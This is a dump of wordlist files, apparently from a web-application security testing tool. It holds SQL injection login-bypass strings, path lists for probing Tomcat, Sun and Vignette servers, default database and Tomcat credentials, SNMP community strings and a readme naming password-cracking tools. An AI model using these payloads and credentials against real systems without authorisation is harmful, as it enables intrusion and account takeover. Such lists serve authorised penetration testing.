39 | " or 1=1# 40 | admin'# 41 | now() 42 | 43 | -------------------------------------------------------------------------------- /wordlist/vulns/sunas.txt: -------------------------------------------------------------------------------- 1 | ias-samples 2 | ias-samples/index.html 3 | index.html 4 | cgi-bin 5 | cgi-bin/gx.cgi 6 | cgi-bin/gx.dll 7 | cgi-bin/gx.exe 8 | gx 9 | gx.cgi 10 | gx.exe 11 | GXApp 12 | GXApp/index.html 13 | GXApp/COnlineBank 14 | GXApp/COnlineBank/COBLogin.html 15 | GXApp/CSample 16 | GXApp/CSample/index.html 17 | GXApp/images 18 | GXApp/OnlineBank 19 | GXApp/OnlineBank/OBLogin.html 20 | fortune 21 | NASApp/fortune/fortune 22 | lotery 23 | COnlineBank 24 | CSample 25 | OnlineBank 26 | NASApp 27 | NASApp/system 28 | NASApp/system/ValidationError.jsp 29 | NASApp/system/ExceptionThrown.jsp 30 | NASApp/system/JSPRunner 31 | NASApp/system/JSPRunnerSticky 32 | NASApp/system/SessionInvalidator 33 | NASApp/system/StaticServlet 34 | NASApp/system/WelcomeListServlet 35 | NASApp/system/FormAuthServlet 36 | NASApp/system/CertAuthServlet 37 | NASApp/system/BasicAuthServlet 38 | system 39 | ValidationError.jsp 40 | ExceptionThrown.jsp 41 | JSPRunner 42 | JSPRunnerSticky 43 | SessionInvalidator 44 | StaticServlet 45 | WelcomeListServlet 46 | FormAuthServlet 47 | CertAuthServlet 48 | BasicAuthServlet 49 | com.netscape.server.servlet.jsp.JSPRunner 50 | servlet 51 | classes 52 | 53 | -------------------------------------------------------------------------------- /wordlist/vulns/tests.txt: -------------------------------------------------------------------------------- 1 | test 2 | test1 3 | test2 4 | test00 5 | test01 6 | tests 7 | testing 8 | tst 9 | tsts 10 | probando 11 | prueba 12 | prueba1 13 | prueba2 14 | prueba00 15 | prueba01 16 | pruebas 17 | prova 18 | prova1 19 | prova2 20 | provas 21 | TEST 22 | TESTS 23 | Test 24 | Tests 25 | tester 26 | Pruebas 27 | PRUEBA 28 | PRUEBAS 29 | Prova 30 | Provas 31 | demo 32 | DEMO 33 | Demo 34 | 35 | -------------------------------------------------------------------------------- /wordlist/vulns/tomcat.txt: -------------------------------------------------------------------------------- 1 | examples 2 | examples/jsp/index.html 3 | examples/servlets/index.html 4 | examples/servlet/HelloWorldExample 5 | examples/servlet/org.apache.catalina.INVOKER.HelloWorldExample 6 | examples/servlet/snoop 7 | examples/servlet/SnoopServlet 8 | examples/servlet/org.apache.catalina.INVOKER.SnoopServlet 9 | examples/servlet/TroubleShooter 10 | examples/servlet/org.apache.catalina.INVOKER.TroubleShooter 11 | examples/jsp/snp/snoop.jsp 12 | examples/jsp/source.jsp 13 | servlet/default/ 14 | servlet/org.apache.catalina.servlets.DefaultServlet/ 15 | examples/servlet/default/jsp/snp/snoop.jsp 16 | examples/servlet/default/jsp/source.jsp 17 | examples/servlet/org.apache.catalina.servlets.DefaultServlet/jsp/snp/snoop.jsp 18 | examples/servlet/org.apache.catalina.servlets.DefaultServlet/jsp/source.jsp 19 | manager 20 | tomcat-docs 21 | webdav 22 | webdav/index.html 23 | webdav/servlet/webdav/ 24 | webdav/servlet/org.apache.catalina.servlets.WebdavServlet/ 25 | servlet/org.apache.catalina.servlets.WebdavServlet/ 26 | servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.WebdavServlet/ 27 | examples/servlet/org.apache.catalina.servlets.WebdavServlet/jsp/snp/snoop.jsp 28 | examples/servlet/org.apache.catalina.servlets.WebdavServlet/jsp/source.jsp 29 | servlet/org.apache.catalina.servlets.SnoopAllServlet 30 | servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.SnoopAllServlet 31 | servlet/org.apache.catalina.servlets.ManagerServlet 32 | servlet/org.apache.catalina.servlets.HTMLManagerServlet 33 | servlet/org.apache.catalina.servlets.InvokerServlet/org.apache.catalina.servlets.SnoopAllServlet 34 | servlet/org.apache.catalina.servlets.InvokerServlet/org.apache.catalina.servlets.DefaultServlet/tomcat.gif 35 | servlet/org.apache.catalina.servlets.DefaultServlet/tomcat.gif 36 | servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.DefaultServlet/tomcat.gif 37 | -------------------------------------------------------------------------------- /wordlist/vulns/vignette.txt: -------------------------------------------------------------------------------- 1 | 0,,,00 2 | 0,,,00.html 3 | 1,,,00 4 | 1,,,00.html 5 | CDA 6 | CDS 7 | CMA 8 | CMS 9 | Deleting 10 | Docs 11 | Editing 12 | HOME 13 | Images 14 | Internal 15 | MetaDataUpdate 16 | Report 17 | Select 18 | StoryServer 19 | TMT 20 | VGN 21 | XML 22 | ac 23 | allvars 24 | asp 25 | aspstatus 26 | cda 27 | cds 28 | cma 29 | cms 30 | controller 31 | diag 32 | docs 33 | edit 34 | error 35 | errorpage 36 | errors 37 | executequery 38 | external 39 | home 40 | ibm 41 | initialize 42 | internal 43 | jsp 44 | jspstatus 45 | jsptest 46 | legacy 47 | license 48 | listcolumns 49 | login 50 | loginlogo 51 | logo 52 | main 53 | menu 54 | metadataupdate 55 | performance 56 | portal 57 | ppstats 58 | preview 59 | previewer 60 | record 61 | reset 62 | save 63 | stat 64 | status 65 | storyserver 66 | style 67 | stylepreviewer 68 | utils 69 | vdc 70 | vgn 71 | vr 72 | Ping.jsp 73 | HelloWorld.jsp 74 | 75 | -------------------------------------------------------------------------------- /wordlist/webservices/ws-dirs.txt: -------------------------------------------------------------------------------- 1 | ServiceDefinition 2 | admin 3 | atom 4 | axis 5 | context 6 | default 7 | disco 8 | extwsdl 9 | index 10 | inquire 11 | inquiryapi 12 | inspection 13 | interface 14 | interfaces 15 | jboss-net 16 | jbossws 17 | juddi 18 | manual 19 | methods 20 | name 21 | names 22 | operation 23 | operations 24 | oracle 25 | proxy 26 | publish 27 | publishing 28 | query 29 | rss 30 | service 31 | services 32 | svce 33 | uddi 34 | uddiexplorer 35 | uddigui 36 | uddilistener 37 | uddisoap 38 | webservice 39 | webserviceclient 40 | webserviceclient+ssl 41 | webservices 42 | ws 43 | ws4ee 44 | wsatom 45 | wsdl 46 | wsgw 47 | wsil 48 | xmethods 49 | -------------------------------------------------------------------------------- /wordlist/webservices/ws-files.txt: -------------------------------------------------------------------------------- 1 | 2 | .asmx 3 | .asmx?wsdl 4 | .aspx 5 | .atom 6 | .disco 7 | .html 8 | .java 9 | .jsp 10 | .jws 11 | .jws?wsdl 12 | .php 13 | .pl 14 | .py 15 | .rss 16 | .svc 17 | .wsdl 18 | ?disco 19 | ?wsdl 20 | -------------------------------------------------------------------------------- /wordlist/wordlists-misc/accidental_profanity.txt: -------------------------------------------------------------------------------- 1 | Scunthorpe General Hospital 2 | Penistone Community Church 3 | Lightwater Country Park 4 | Jimmy Clitheroe 5 | Horniman Museum 6 | shitake mushrooms 7 | RomansInSussex.co.uk 8 | http://www.cum.qc.ca/ 9 | Craig Cockburn, Software Specialist 10 | Linda Callahan 11 | Dr. Herman I. Libshitz 12 | magna cum laude 13 | Super Bowl XXX 14 | medieval erection of parapets 15 | evaluate 16 | mocha 17 | expression 18 | Arsenal canal 19 | classic 20 | Tyson Gay 21 | Dick Van Dyke 22 | basement 23 | -------------------------------------------------------------------------------- /wordlist/wordlists-misc/common-http-ports.txt: -------------------------------------------------------------------------------- 1 | 66 2 | 80 3 | 81 4 | 443 5 | 445 6 | 457 7 | 1080 8 | 1100 9 | 1241 10 | 1352 11 | 1433 12 | 1434 13 | 1521 14 | 1944 15 | 2301 16 | 3128 17 | 3306 18 | 4000 19 | 4001 20 | 4002 21 | 4100 22 | 5000 23 | 5432 24 | 5800 25 | 5801 26 | 5802 27 | 6346 28 | 6347 29 | 7001 30 | 7002 31 | 8080 32 | 8888 33 | 30821 34 | -------------------------------------------------------------------------------- /wordlist/wordlists-misc/numeric.txt: -------------------------------------------------------------------------------- 1 | 0 2 | 1 3 | 1.00 4 | $1.00 5 | 1/2 6 | 1E2 7 | 1E02 8 | 1E+02 9 | -1 10 | -1.00 11 | -$1.00 12 | -1/2 13 | -1E2 14 | -1E02 15 | -1E+02 16 | 1/0 17 | 0/0 18 | -2147483648/-1 19 | -9223372036854775808/-1 20 | -0 21 | -0.0 22 | +0 23 | +0.0 24 | 0.00 25 | 0..0 26 | . 27 | 0.0.0 28 | 0,00 29 | 0,,0 30 | , 31 | 0,0,0 32 | 0.0/0 33 | 1.0/0.0 34 | 0.0/0.0 35 | 1,0/0,0 36 | 0,0/0,0 37 | --1 38 | - 39 | -. 40 | -, 41 | 999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999 42 | NaN 43 | Infinity 44 | -Infinity 45 | INF 46 | 1#INF 47 | -1#IND 48 | 1#QNAN 49 | 1#SNAN 50 | 1#IND 51 | 0x0 52 | 0xffffffff 53 | 0xffffffffffffffff 54 | 0xabad1dea 55 | 123456789012345678901234567890123456789 56 | 1,000.00 57 | 1 000.00 58 | 1'000.00 59 | 1,000,000.00 60 | 1 000 000.00 61 | 1'000'000.00 62 | 1.000,00 63 | 1 000,00 64 | 1'000,00 65 | 1.000.000,00 66 | 1 000 000,00 67 | 1'000'000,00 68 | 01000 69 | 08 70 | 09 71 | 2.2250738585072011e-308 72 | -------------------------------------------------------------------------------- /wordlist/wordlists-misc/wordlist-alphanumeric-case.txt: -------------------------------------------------------------------------------- 1 | 0 2 | 1 3 | 2 4 | 3 5 | 4 6 | 5 7 | 6 8 | 7 9 | 8 10 | 9 11 | a 12 | b 13 | c 14 | d 15 | e 16 | f 17 | g 18 | h 19 | i 20 | j 21 | k 22 | l 23 | m 24 | n 25 | o 26 | p 27 | q 28 | r 29 | s 30 | t 31 | u 32 | v 33 | w 34 | x 35 | y 36 | z 37 | A 38 | B 39 | C 40 | D 41 | E 42 | F 43 | G 44 | H 45 | I 46 | J 47 | K 48 | L 49 | M 50 | N 51 | O 52 | P 53 | Q 54 | R 55 | S 56 | T 57 | U 58 | V 59 | W 60 | X 61 | Y 62 | Z 63 | -------------------------------------------------------------------------------- /wordlist/wordlists-misc/wordlist-common-snmp-community-strings.txt: -------------------------------------------------------------------------------- 1 | public 2 | private 3 | 0 4 | 0392a0 5 | 1234 6 | 2read 7 | 4changes 8 | ANYCOM 9 | Admin 10 | C0de 11 | CISCO 12 | CR52401 13 | IBM 14 | ILMI 15 | Intermec 16 | NoGaH$@! 17 | OrigEquipMfr 18 | PRIVATE 19 | PUBLIC 20 | Private 21 | Public 22 | SECRET 23 | SECURITY 24 | SNMP 25 | SNMP_trap 26 | SUN 27 | SWITCH 28 | SYSTEM 29 | Secret 30 | Security 31 | s!a@m#n$p%c 32 | Switch 33 | System 34 | TENmanUFactOryPOWER 35 | TEST 36 | access 37 | adm 38 | admin 39 | agent 40 | agent_steal 41 | all 42 | all private 43 | all public 44 | apc 45 | bintec 46 | blue 47 | c 48 | cable-d 49 | canon_admin 50 | cc 51 | cisco 52 | community 53 | core 54 | debug 55 | default 56 | dilbert 57 | enable 58 | field 59 | field-service 60 | freekevin 61 | fubar 62 | guest 63 | hello 64 | hp_admin 65 | ibm 66 | ilmi 67 | intermec 68 | internal 69 | l2 70 | l3 71 | manager 72 | mngt 73 | monitor 74 | netman 75 | network 76 | none 77 | openview 78 | pass 79 | password 80 | pr1v4t3 81 | proxy 82 | publ1c 83 | read 84 | read-only 85 | read-write 86 | readwrite 87 | red 88 | regional 89 | rmon 90 | rmon_admin 91 | ro 92 | root 93 | router 94 | rw 95 | rwa 96 | san-fran 97 | sanfran 98 | scotty 99 | secret 100 | security 101 | seri 102 | snmp 103 | snmpd 104 | snmptrap 105 | solaris 106 | sun 107 | superuser 108 | switch 109 | system 110 | tech 111 | test 112 | test2 113 | tiv0li 114 | tivoli 115 | trap 116 | world 117 | write 118 | xyzzy 119 | yellow 120 | -------------------------------------------------------------------------------- /wordlist/wordlists-misc/wordlist-dna.txt: -------------------------------------------------------------------------------- 1 | a 2 | t 3 | c 4 | g 5 | -------------------------------------------------------------------------------- /wordlist/wordlists-user-passwd/db2/db2_default_pass.txt: -------------------------------------------------------------------------------- 1 | db2inst1 2 | dasusr1 3 | db2fenc1 4 | db2pass 5 | db2pw 6 | db2password 7 | admin 8 | db2admin 9 | -------------------------------------------------------------------------------- /wordlist/wordlists-user-passwd/db2/db2_default_user.txt: -------------------------------------------------------------------------------- 1 | db2inst1 2 | dasusr1 3 | db2fenc1 4 | admin 5 | db2admin 6 | -------------------------------------------------------------------------------- /wordlist/wordlists-user-passwd/db2/db2_default_userpass.txt: -------------------------------------------------------------------------------- 1 | db2inst1 db2inst1 2 | db2inst1 db2pass 3 | db2inst1 db2pw 4 | db2inst1 db2password 5 | dasusr1 dasusr1 6 | db2fenc1 db2fenc1 7 | db2admin db2admin 8 | 9 | -------------------------------------------------------------------------------- /wordlist/wordlists-user-passwd/generic-listpairs/http_default_pass.txt: -------------------------------------------------------------------------------- 1 | admin 2 | password 3 | manager 4 | letmein 5 | cisco 6 | default 7 | root 8 | apc 9 | pass 10 | security 11 | user 12 | system 13 | sys 14 | none 15 | -------------------------------------------------------------------------------- /wordlist/wordlists-user-passwd/generic-listpairs/http_default_userpass.txt: -------------------------------------------------------------------------------- 1 | # needs help 2 | connect connect 3 | sitecom sitecom 4 | admin 1234 5 | cisco cisco 6 | cisco sanfran 7 | private private 8 | -------------------------------------------------------------------------------- /wordlist/wordlists-user-passwd/generic-listpairs/http_default_users.txt: -------------------------------------------------------------------------------- 1 | admin 2 | manager 3 | root 4 | cisco 5 | apc 6 | pass 7 | security 8 | user 9 | system 10 | sys 11 | -------------------------------------------------------------------------------- /wordlist/wordlists-user-passwd/oracle/_hci_oracle_passwords.txt: -------------------------------------------------------------------------------- 1 | "AMBU,hacschema" 2 | "QUEUE_USER,qmanager" 3 | "SYS,alLp0ver2" 4 | "SYSTEM,urA7mvP" 5 | "CHANGEMGR,datacontrol" 6 | "CCDEV,ccdev" 7 | "CCDBA,ccnulls " 8 | "CCDATA,ccdata" 9 | "CCFORMS,ccforms" 10 | "CCINTERFACE,ccinterface" 11 | "MCKHEO,mckheo" 12 | "CCREL,ccrel" 13 | "CCQUERY,ccquery" 14 | "CDXWEB,winplu5" 15 | "DRUG1,fdb3schema" 16 | "DRUG2,fdb3schema" 17 | "enc_ent,encent" 18 | "ENT,entpazz" 19 | "ENT_CONFIG,ent_configpazz" 20 | "ADF,adfpazz" 21 | "INF,infpazz" 22 | "INF_CONFIG,inf_configpazz" 23 | "SDM,sdmpazz" 24 | "STRMADM,pazzw0rd" 25 | "ENT_AUD,pazzw0rd" 26 | "ENT_ARCH,pazzw0rd" 27 | "POC_ARCH,pazzw0rd" 28 | "POC_AQ,qmanager" 29 | "INF_AQ,qmanager" 30 | "DATAMGR,datamgr" 31 | "CCUSER,bueno" 32 | "ALERTS,monitorhca" 33 | "HCALERTS,alertsuser" 34 | "AM,ampazz" 35 | "AM_AUD,pazzw0rd" 36 | "AUD,audpazz" 37 | "TMF,tmfpazz" 38 | "MN,mnpazz" 39 | "EH,ehpazz" 40 | "NG,ngpazz" 41 | "DM,dmpazz" 42 | "DMTOOL,dmtoolpazz" 43 | "STG_DMT,stg_dmtpazz" 44 | "WRL,wrlpazz" 45 | "NOTES,notespazz" 46 | "REPORTS,reportspazz" 47 | "ICONS,iconspazz" 48 | "BS,bspazz" 49 | "QZ,qzpazz" 50 | "RM,rmpazz" 51 | "RM_AUD,pazzw0rd" 52 | "COMMGR,commgrpazz" 53 | "OPSERVICE,opservicepazz" 54 | "SEC_CONFIG,sec_configpazz" 55 | "CTXSYS,ctxsyspazz" 56 | "OLOGY,ologypazz" 57 | "OLOGY_CONFIG,ology_configpazz" 58 | "DOC,docpazz" 59 | "DOC_CONFIG,doc_configpazz" 60 | "PORTAL,portal" 61 | "PORTAL_INSTALL,portal_install" 62 | "EBIDBADMIN,ebidbadmin" 63 | "DESIGN_OWNER,owb" 64 | "OWB_RUNTIME_REPOSITORY,owb" 65 | "RUNTIME_A_USER,owb" 66 | -------------------------------------------------------------------------------- /wordlist/wordlists-user-passwd/passwds/phpbb.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dzonerzy/goWAPT/3aed792cbca3ec8f7fbf106c39116b197188924b/wordlist/wordlists-user-passwd/passwds/phpbb.txt -------------------------------------------------------------------------------- /wordlist/wordlists-user-passwd/postgres/postgres_default_pass.txt: -------------------------------------------------------------------------------- 1 | 2 | tiger 3 | postgres 4 | password 5 | admin 6 | -------------------------------------------------------------------------------- /wordlist/wordlists-user-passwd/postgres/postgres_default_user.txt: -------------------------------------------------------------------------------- 1 | postgres 2 | scott 3 | admin 4 | -------------------------------------------------------------------------------- /wordlist/wordlists-user-passwd/postgres/postgres_default_userpass.txt: -------------------------------------------------------------------------------- 1 | postgres postgres 2 | postgres password 3 | postgres admin 4 | admin admin 5 | admin password 6 | -------------------------------------------------------------------------------- /wordlist/wordlists-user-passwd/readme.txt: -------------------------------------------------------------------------------- 1 | 2 | various notes 3 | 4 | leetspeak filter 5 | cat plain.wordlist | sed -e 's/a/4/g' -e 's/e/3/g' -e 's/i/1/g' -e 's/o/0/g' -e 's/s/5/g' -e 's/t/7/g' > l337.wordlist 6 | 7 | more wordlists 8 | ftp://ftp.ox.ac.uk/pub/wordlists/ 9 | http://theargon.com/achilles/wordlists/ 10 | http://www.totse.com/en/hack/word_lists/index.html 11 | http://www.outpost9.com/files/WordLists.html 12 | http://packetstormsecurity.org/Crackers/wordlists/ 13 | 14 | passwd brute force tools 15 | 16 | cupp - passwd profiler 17 | http://www.remote-exploit.org/?page_id=506 18 | 19 | awlg - associative wordlist generator 20 | http://awlg.org/index.gen 21 | 22 | thc-hydra 23 | http://freeworld.thc.org/thc-hydra/ 24 | 25 | cain & abel 26 | http://www.oxid.it/cain.html 27 | 28 | jtr 29 | http://www.openwall.com/john/ 30 | 31 | lcp - free l0phtcrack replacement 32 | http://www.lcpsoft.com/english/download.htm 33 | 34 | 35 | -------------------------------------------------------------------------------- /wordlist/wordlists-user-passwd/tomcat/tomcat_mgr_default_pass.txt: -------------------------------------------------------------------------------- 1 | admin 2 | manager 3 | role1 4 | root 5 | tomcat 6 | -------------------------------------------------------------------------------- /wordlist/wordlists-user-passwd/tomcat/tomcat_mgr_default_userpass.txt: -------------------------------------------------------------------------------- 1 | j2deployer j2deployer 2 | ovwebusr OvW*busr1 3 | cxsdk kdsxc 4 | root owaspbwa 5 | -------------------------------------------------------------------------------- /wordlist/wordlists-user-passwd/tomcat/tomcat_mgr_default_users.txt: -------------------------------------------------------------------------------- 1 | admin 2 | manager 3 | role1 4 | root 5 | tomcat 6 | both 7 | -------------------------------------------------------------------------------- /wordlist/wordlists-user-passwd/unix-os/unix_users.txt: -------------------------------------------------------------------------------- 1 | 4Dgifts 2 | EZsetup 3 | OutOfBox 4 | ROOT 5 | adm 6 | admin 7 | administrator 8 | anon 9 | auditor 10 | avahi 11 | avahi-autoipd 12 | backup 13 | bbs 14 | bin 15 | checkfs 16 | checkfsys 17 | checksys 18 | cmwlogin 19 | couchdb 20 | daemon 21 | dbadmin 22 | demo 23 | demos 24 | diag 25 | distccd 26 | dni 27 | fal 28 | fax 29 | ftp 30 | games 31 | gdm 32 | gnats 33 | gopher 34 | gropher 35 | guest 36 | haldaemon 37 | halt 38 | hplip 39 | informix 40 | install 41 | irc 42 | kernoops 43 | libuuid 44 | list 45 | listen 46 | lp 47 | lpadm 48 | lpadmin 49 | lynx 50 | mail 51 | man 52 | me 53 | messagebus 54 | mountfs 55 | mountfsys 56 | mountsys 57 | news 58 | noaccess 59 | nobody 60 | nobody4 61 | nuucp 62 | nxpgsql 63 | operator 64 | oracle 65 | popr 66 | postgres 67 | postmaster 68 | printer 69 | proxy 70 | pulse 71 | rfindd 72 | rje 73 | root 74 | rooty 75 | saned 76 | service 77 | setup 78 | sgiweb 79 | sigver 80 | speech-dispatcher 81 | sshd 82 | sym 83 | symop 84 | sync 85 | sys 86 | sysadm 87 | sysadmin 88 | sysbin 89 | syslog 90 | system_admin 91 | trouble 92 | udadmin 93 | ultra 94 | umountfs 95 | umountfsys 96 | umountsys 97 | unix 98 | us_admin 99 | user 100 | uucp 101 | uucpadm 102 | web 103 | webmaster 104 | www 105 | www-data 106 | xpdb 107 | xpopr 108 | zabbix 109 | --------------------------------------------------------------------------------